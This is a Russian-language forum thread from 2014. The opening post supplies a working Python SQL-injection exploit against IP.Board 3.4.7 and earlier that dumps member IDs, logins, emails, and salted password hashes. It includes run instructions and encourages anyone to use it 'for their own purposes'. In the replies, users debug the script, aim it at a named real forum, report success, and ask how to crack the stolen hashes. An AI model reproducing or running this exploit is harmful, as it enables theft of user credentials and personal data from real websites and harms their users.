[Уязвимость] Угоняем базу форума IPB версии 3.4.7 и меньше - Zhyk.Ru Forums
Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.Ru LIVE! Реклама на Zhyk.Ru Доска почета top.zhyk.ru (beta) Премиум-аккаунт

Угоняем базу форума IPB версии 3.4.7 и меньше

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Ответ
 
Опции темы Опции просмотра
Старый 09.12.2014, 23:08   #1
 Разведчик
Аватар для slastikdj
 
slastikdj никому не известный тип
Регистрация: 28.11.2012
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 6 раз(а) в 1 сообщении
 
Exclamation Угоняем базу форума IPB версии 3.4.7 и меньше

С помощью приведенного ниже эксплойта проводим sql инъекцию на форумах IPB <=3.4.7 и добываем базу пользователей, а именно:
- ид юзера, логин, мыло, пароль в зашифрованном виде (для тех кто не знает, хэш на IPB следующего вида: md5(md5($salt).md5($pass)), соль.

Что же нужно делать?
- Ищем сервер с форумом на IP.Board
- Запускаем скрипт, предварительно вписав адрес атакуемого форума, с помощью python 2 (скачать с офф сайта: [Ссылки могут видеть только зарегистрированные пользователи. ]) с помощью командной строки и команды вида:

Цитата:
c:\python\python.exe c:\exploit.py

Exploit:
PHP код:
#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway () safe-mail net
# IP.Board <= 3.4.7 SQLi (blind, error based); 
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable

url 'http://адрес_форума/'
ua "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sysre

# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>

import urllib2urllib

def inject
(sql):
    try:
        
urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' urldata="act=login&idType=id&id[]=-1&id[]=%s" urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' sql), headers={"User-agent"ua}))
    
except urllib2.HTTPErrore:
        if 
e.code == 503:
            
data urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' urlheaders={"User-agent"ua})).read()
            
txt re.search("XPATH syntax error: ':(.*)'"datare.MULTILINE)
            if 
txt is not None
                return 
txt.group(1)
            
sys.exit('Error [3], received unexpected data:\n%s' data)
        
sys.exit('Error [1]')
    
sys.exit('Error [2]')

def get(nametablenum):
    
sqli 'SELECT %s FROM %s LIMIT %d,1' % (nametablenum)
    
int(inject('LENGTH((%s))' sqli))
    if 
31:
        return 
inject(sqli)
    else:
        
''
        
for i in range(1s+131):
            
+= inject('SUBSTRING((%s), %i, %i)' % (sqlii31))
        return 
r

inject('SELECT COUNT(*) FROM members')
print 
'* Found %s users' n
for j in range(int(n)):    
    print 
get('member_id''members'j)
    print 
get('name''members'j)
    print 
get('email''members'j)
    print 
get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)''members'j)
    print 
'----------------' 
Пытался разжевать как можно тщательнее, чтоб любой, даже не самый умный, смог использовать эту уязвимость в своих целях

P.S.: серверов много, которые подвержены этой уязвимости, даже топовые есть.
  Ответить с цитированием
6 пользователя(ей) сказали cпасибо:
Ekzuperi (10.12.2014), m4r1n (02.02.2015), shustrik1993 (12.12.2014), SoloMMR (04.02.2015), tem3ik (10.12.2014), Zheludd (21.12.2014)
Старый 10.12.2014, 16:14   #2
 Разведчик
Аватар для qBattery
 
qBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компании
Регистрация: 27.08.2013
Сообщений: 16
Популярность: 918
Сказал(а) спасибо: 20
Поблагодарили 13 раз(а) в 4 сообщениях
Отправить сообщение для qBattery с помощью Skype™
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Выдает Error [2] что значит?
________________
  Ответить с цитированием
Старый 10.12.2014, 22:31   #3
 Разведчик
Аватар для Ekzuperi
 
Ekzuperi на правильном пути
Регистрация: 22.06.2011
Сообщений: 26
Популярность: 20
Сказал(а) спасибо: 21
Поблагодарили 25 раз(а) в 10 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Кушаем пока не поздно называется)

Добавлено через 14 минут
Цитата:
Сообщение от qBatteryПосмотреть сообщение
Выдает Error [2] что значит?

Аналогично.

Последний раз редактировалось Ekzuperi; 10.12.2014 в 22:45. Причина: Добавлено сообщение
  Ответить с цитированием
Старый 10.12.2014, 23:41   #4
 Разведчик
Аватар для Keiner
 
Keiner никому не известный тип
Регистрация: 27.03.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

[Ссылки могут видеть только зарегистрированные пользователи. ]

вот с таким что делать?

Добавлено через 1 час 17 минут
c6089cb5de48a32fafba7ddd08d576e7

что за пасс?

Последний раз редактировалось Keiner; 11.12.2014 в 00:59. Причина: Добавлено сообщение
  Ответить с цитированием
Старый 11.12.2014, 02:57   #5
 Разведчик
Аватар для Ekzuperi
 
Ekzuperi на правильном пути
Регистрация: 22.06.2011
Сообщений: 26
Популярность: 20
Сказал(а) спасибо: 21
Поблагодарили 25 раз(а) в 10 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

В md5 пароль.
  Ответить с цитированием
Старый 11.12.2014, 14:14   #6
 Разведчик
Аватар для Denik18
 
Denik18 неизвестен в этих краях
Регистрация: 21.03.2013
Сообщений: 2
Популярность: -53
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от KeinerПосмотреть сообщение
[Ссылки могут видеть только зарегистрированные пользователи. ]

вот с таким что делать?


что ты решил с этим? у меня тоже самое
  Ответить с цитированием
Старый 11.12.2014, 14:44   #7
 Разведчик
Аватар для Keiner
 
Keiner никому не известный тип
Регистрация: 27.03.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Без правки скрипта ничего не сделать, это я на своем форуме смотрел. А значит, что злом возможен, но с правкой под форум...
  Ответить с цитированием
Старый 11.12.2014, 15:14   #8
 Разведчик
Аватар для figvam74
 
figvam74 на правильном пути
Регистрация: 30.06.2011
Сообщений: 14
Популярность: 94
Сказал(а) спасибо: 1
Поблагодарили 17 раз(а) в 11 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

url = 'http://адрес_форума/'

заменить на
http://forum.l2damage.ru/

Пробуйте)))
________________
Помог, тыкни спасибку) в долгу не останусь!
  Ответить с цитированием
Пользователь сказал cпасибо:
AttractiveStis (11.12.2014)
Старый 11.12.2014, 16:13   #9
 Разведчик
Аватар для SandeL
 
SandeL скоро будет известенSandeL скоро будет известенSandeL скоро будет известенSandeL скоро будет известен
Регистрация: 04.02.2010
Сообщений: 19
Популярность: 336
Сказал(а) спасибо: 32
Поблагодарили 31 раз(а) в 14 сообщениях
Отправить сообщение для SandeL с помощью ICQ Отправить сообщение для SandeL с помощью Skype™
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

куда только он их сохраняет ,когда задампит ?
  Ответить с цитированием
Старый 11.12.2014, 18:53   #10
 Разведчик
Аватар для Keiner
 
Keiner никому не известный тип
Регистрация: 27.03.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от figvam74Посмотреть сообщение
url = 'http://адрес_форума/'

заменить на
http://forum.l2damage.ru/

Пробуйте)))

А так пишет что синтаксис кривой
  Ответить с цитированием
Старый 11.12.2014, 19:33   #11
 Разведчик
Аватар для figvam74
 
figvam74 на правильном пути
Регистрация: 30.06.2011
Сообщений: 14
Популярность: 94
Сказал(а) спасибо: 1
Поблагодарили 17 раз(а) в 11 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от KeinerПосмотреть сообщение
А так пишет что синтаксис кривой

url = 'http://адрес_форума/'

заменить на
url = 'http://forum.l2damage.ru/

То есть вот так ) имел ввиду) Пробуй)
________________
Помог, тыкни спасибку) в долгу не останусь!
  Ответить с цитированием
Старый 11.12.2014, 19:44   #12
Заблокирован
 Сержант
Аватар для NeonEye
 
NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(NeonEye сломал счётчик популярности :(
Регистрация: 15.08.2013
Сообщений: 141
Популярность: 11835
Сказал(а) спасибо: 265
Поблагодарили 100 раз(а) в 59 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Error [2]

Добавлено через 15 минут
Цитата:
Сообщение от figvam74Посмотреть сообщение
url = 'http://адрес_форума/'

заменить на
http://forum.l2damage.ru/

Пробуйте)))

Это работает

Последний раз редактировалось NeonEye; 11.12.2014 в 20:00. Причина: Добавлено сообщение
  Ответить с цитированием
Старый 11.12.2014, 22:35   #13
 Разведчик
Аватар для qBattery
 
qBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компанииqBattery душа компании
Регистрация: 27.08.2013
Сообщений: 16
Популярность: 918
Сказал(а) спасибо: 20
Поблагодарили 13 раз(а) в 4 сообщениях
Отправить сообщение для qBattery с помощью Skype™
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от EkzuperiПосмотреть сообщение
Кушаем пока не поздно называется)

Добавлено через 14 минут


Аналогично.

Как бы в ноябре еще фикс был выложен )))
________________
  Ответить с цитированием
Старый 12.12.2014, 02:20   #14
 Разведчик
Аватар для slastikdj
 
slastikdj никому не известный тип
Регистрация: 28.11.2012
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 6 раз(а) в 1 сообщении
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от qBatteryПосмотреть сообщение
Как бы в ноябре еще фикс был выложен )))

Мало кто пофиксил
  Ответить с цитированием
Старый 12.12.2014, 08:40   #15
 Разведчик
Аватар для figvam74
 
figvam74 на правильном пути
Регистрация: 30.06.2011
Сообщений: 14
Популярность: 94
Сказал(а) спасибо: 1
Поблагодарили 17 раз(а) в 11 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Вопрос к автору темы, либо к кому либо кто тут есть вообще и разбирается в этом)
Вот угнал базу, он в md5(md5($salt).md5($pass)) + соль) Можно ли как то это теперь расшифровать?) т.е. расшифровка обычная, как и базы серверов ла2, или куда сложней?) Честно мало в этом разбираюсь, вот и спрашиваю)
________________
Помог, тыкни спасибку) в долгу не останусь!
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продам базу форума игроков WoT kcash World of Tanks 0 31.07.2013 15:29

www.webmoney.ru
Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 17:37.

Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Protected by GShost.net